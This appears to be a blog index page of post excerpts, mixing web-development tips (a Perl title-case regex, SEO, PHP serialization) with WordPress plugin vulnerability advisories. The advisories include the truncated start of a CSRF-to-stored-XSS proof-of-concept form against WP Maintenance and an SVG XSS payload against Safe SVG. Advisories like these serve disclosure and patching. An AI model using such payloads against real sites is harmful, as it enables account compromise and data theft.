Blog
Title Case Regular Expression
You feed a string into a regular expression and it comes out in Title Case. Since Perl, PHP and ASP all support regular expressions, this expression is useful in each of them with a little tinkering:
$x =~ s/(\w+)/\u\L$1/g;
$x =~ s/(\sand|of\s)/\L$1/ig if ($x =~ /\sand|of\s/i);
Enjoy!
How Do You Pick A Good SEO?
The task of picking the right SEO agency is difficult. There are so many of them. It's the Wild West. When you give them your credit card, are they buying AdWords for your business or for themselves? A good SEO agency will never have a problem sharing all of their...
WP Maintenance <= 5.0.5 – Cross-Site Request Forgery to Stored Cross-Site Scripting
<html> <body> <form action="http://URL/wp-admin/admin.php?page=wp-maintenance" method="POST"> <input type="hidden" name="action" value="update_general" /> <input type="hidden" name="wp_maintenance_active" value="1" /> <input...
The Divi Migrator
I am going to build a plugin to satisfy that need. What do you think? What would you need a Divi Migrator / Integrator to do?
Turning A List Of MySQL Rows Into A Serialized PHP string
Turn a list of rows from MySQL into a serialized PHP result
Safe SVG < 1.9.6 – XSS Protection Bypass
Video POC (for <= 1.9.4): https://drive.google.com/open?id=19-sin0HB97L0tPMUAaGjgE5KjP4lXSuw Create an SVG with the payload below to trigger XSS: ```<?xml version="1.0" standalone="no"?> <svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"> <a...
Blog2Social < 5.9.0 – Cross-Site Scripting Issue
Publicly Published 2019-11-14 (about 23 hours ago) Added 2019-11-14 (about 15 hours ago) Last Updated 2019-11-14 (about 15 hours ago)
Email Subscribers & Newsletters < 4.2.3 – Multiple Issues
- Unauthenticated Export, leading to disclosure of subscribers' data
- Insecure Permissions on Dashboard and Settings
- CSRF on Settings
- Send Test Emails from the Administrative Dashboard as an Authenticated User (with a role of Subscriber and above)
- ...
IgniteUp < 3.4.1 – Multiple Issues
All issues can be triggered by unauthenticated users:
- Arbitrary File Deletion
- HTML injection & CSRF in email messages
- Stored Cross-Site Scripting
- Disclosure of subscribers' email addresses
- Arbitrary subscriber deletion
- Arbitrary plugin template switch
YIT Plugin Framework <= 3.3.8 – Authenticated Plugin's Settings Change
fixed in version 2.2.14 fixed in version 2.3.15 fixed in version 1.3.15 fixed in version 1.3.12 fixed in version 1.7.1 fixed in version 1.3.21 fixed in version 1.3.7 fixed in version 1.4.9 fixed in version 1.3.6 fixed in version 1.2.11 fixed in version 1.2.13 fixed in...
What is the Cost Of Web Development?
Design Rush has a piece on the cost of web development. Check it out!